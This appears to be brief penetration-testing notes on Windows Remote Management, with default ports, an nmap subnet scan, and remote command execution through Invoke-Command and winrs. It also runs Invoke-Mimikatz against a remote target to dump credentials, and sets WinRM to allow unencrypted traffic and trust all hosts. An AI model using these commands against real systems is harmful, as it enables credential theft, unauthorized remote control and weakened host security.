Windows Remote Management
- 默认端口 HTTP 5985, HTTPS 5986
- Windows Remote Shell (WinRS)
- Windows 2008+
- 参考
# AlpineLinux
apk add nmap-scripts nmap-nselibs
nmap -p 5985,5986 -sV 192.168.0.0/24
Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ }
Import-Module ./Invoke-Mimikatz.ps1
Invoke-Mimikatz -ComputerName TARGET
Enable-PSRemoting -Force
winrm quickconfig
winrm set winrm/config/Client @{AllowUnencrypted = "true"}
Set-Item WSMan:localhost\client\trustedhosts -value *
winrm enumerate winrm/config/Listener
winrm quickconfig -transport:http
winrm e winrm/config/listener
# 远程执行
winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"
winrs -r:http://WIN-2NE38K15TGH/wsman "net localgroup administrators"